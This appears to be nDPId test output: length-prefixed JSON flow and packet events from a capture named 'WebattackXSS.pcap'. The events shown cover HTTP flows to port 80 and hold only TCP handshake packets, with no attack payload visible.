-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347769077,"flow_last_seen":1499347774833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60734,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347770345,"flow_last_seen":1499347775834,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60748,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347770345,"flow_last_seen":1499347775834,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60748,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347771635,"flow_last_seen":1499347776834,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60762,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347771635,"flow_last_seen":1499347776834,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60762,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347774205,"flow_last_seen":1499347779835,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60788,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347774205,"flow_last_seen":1499347779835,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60788,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7722,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347896716,"flow_last_seen":1499347896716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347896716,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33836,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7722,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":546,"flow_packet_id":1,"flow_last_seen":1499347896716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347896716,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SsxAAD4GewSsEAABwKgKMoQsAFDW1Dn8AAAAAKACchBVSgAAAgQFtAQCCAoBPHMwAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":546,"flow_packet_id":2,"flow_last_seen":1499347896716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347896716,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhCxEXQKe1tQ5\/aAScSDGowAAAgQFtAQCCAoD5kSkATxzMAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7724,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":546,"flow_packet_id":3,"flow_last_seen":1499347896717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347896717,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Ss1AAD4GewusEAABwKgKMoQsAFDW1Dn9RF0Cn4AQAOVlqwAAAQEICgE8czAD5kSk"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7740,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347899275,"flow_last_seen":1499347899275,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347899275,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33862,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7740,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":547,"flow_packet_id":1,"flow_last_seen":1499347899275,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347899275,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8zuFAAD4G9u6sEAABwKgKMoRGAFBlPbtRAAAAAKACchBC8gAAAgQFtAQCCAoBPHWwAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7741,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":547,"flow_packet_id":2,"flow_last_seen":1499347899275,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347899275,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhEbZtc2dZT27UqAScSBRcwAAAgQFtAQCCAoD5kckATx1sAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7742,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":547,"flow_packet_id":3,"flow_last_seen":1499347899276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347899276,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0zuJAAD4G9vWsEAABwKgKMoRGAFBlPbtS2bXNnoAQAOXwegAAAQEICgE8dbAD5kck"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347900544,"flow_last_seen":1499347900544,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347900544,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33876,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":548,"flow_packet_id":1,"flow_last_seen":1499347900544,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347900544,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8T6pAAD4GdiasEAABwKgKMoRUAFAKnjlHAAAAAKACchAeUQAAAgQFtAQCCAoBPHbtAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7753,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":548,"flow_packet_id":2,"flow_last_seen":1499347900544,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347900544,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhFRwu76qCp45SKAScSCjggAAAgQFtAQCCAoD5khhATx27QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7754,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":548,"flow_packet_id":3,"flow_last_seen":1499347900544,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347900544,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0T6tAAD4Gdi2sEAABwKgKMoRUAFAKnjlIcLu+q4AQAOVCigAAAQEICgE8du0D5khh"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7773,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347903125,"flow_last_seen":1499347903125,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347903125,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33902,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7773,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":549,"flow_packet_id":1,"flow_last_seen":1499347903125,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347903125,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Iy1AAD4GoqOsEAABwKgKMoRuAFDn\/lpfAAAAAKACchAdOQAAAgQFtAQCCAoBPHlyAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7774,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":549,"flow_packet_id":2,"flow_last_seen":1499347903125,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347903125,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhG41OTml5\/5aYKAScSBgbQAAAgQFtAQCCAoD5krmATx5cgEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7775,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":549,"flow_packet_id":3,"flow_last_seen":1499347903125,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347903125,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Iy5AAD4GoqqsEAABwKgKMoRuAFDn\/lpgNTk5poAQAOX\/dAAAAQEICgE8eXID5krm"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7782,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347904387,"flow_last_seen":1499347904387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347904387,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33916,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7782,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":550,"flow_packet_id":1,"flow_last_seen":1499347904387,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347904387,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wAJAAD4GBc6sEAABwKgKMoR8AFDhZ7qvAAAAAKACchDCNgAAAgQFtAQCCAoBPHqtAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7783,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":550,"flow_packet_id":2,"flow_last_seen":1499347904387,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347904387,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhHxZjS4N4We6sKAScSDrcgAAAgQFtAQCCAoD5kwiATx6rQEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7785,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":550,"flow_packet_id":3,"flow_last_seen":1499347904387,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347904387,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wANAAD4GBdWsEAABwKgKMoR8AFDhZ7qwWY0uDoAQAOWKeQAAAQEICgE8eq4D5kwi"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7794,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347905694,"flow_last_seen":1499347905694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905694,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33930,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7794,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":551,"flow_packet_id":1,"flow_last_seen":1499347905694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347905694,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8dZJAAD4GUD6sEAABwKgKMoSKAFAcIA5mAAAAAKACchAycwAAAgQFtAQCCAoBPHv0AAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7795,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":551,"flow_packet_id":2,"flow_last_seen":1499347905694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347905694,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhIr8f9XqHCAOZ6AScSAPmAAAAgQFtAQCCAoD5k1pATx79AEDAwc="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7796,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":551,"flow_packet_id":3,"flow_last_seen":1499347905695,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347905695,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0dZNAAD4GUEWsEAABwKgKMoSKAFAcIA5n\/H\/V64AQAOWunwAAAQEICgE8e\/QD5k1p"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347775487,"flow_last_seen":1499347780836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60802,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347775487,"flow_last_seen":1499347780836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60802,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347776753,"flow_last_seen":1499347781835,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60816,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347776753,"flow_last_seen":1499347781835,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347779333,"flow_last_seen":1499347784836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60842,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347779333,"flow_last_seen":1499347784836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60842,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347780605,"flow_last_seen":1499347785836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60856,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347780605,"flow_last_seen":1499347785836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60856,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347783176,"flow_last_seen":1499347788836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60882,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347783176,"flow_last_seen":1499347788836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60882,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347784519,"flow_last_seen":1499347789837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60896,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347784519,"flow_last_seen":1499347789837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60896,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7812,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347908253,"flow_last_seen":1499347908253,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347908253,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33956,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7812,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":552,"flow_packet_id":1,"flow_last_seen":1499347908253,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347908253,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XLdAAD4GaRmsEAABwKgKMoSkAFDBACLDAAAAAKACchB2mwAAAgQFtAQCCAoBPH50AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7813,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":552,"flow_packet_id":2,"flow_last_seen":1499347908253,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347908253,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhKRv9+kSwQAixKAScSDKoQAAAgQFtAQCCAoD5k\/oATx+dAEDAwc="} 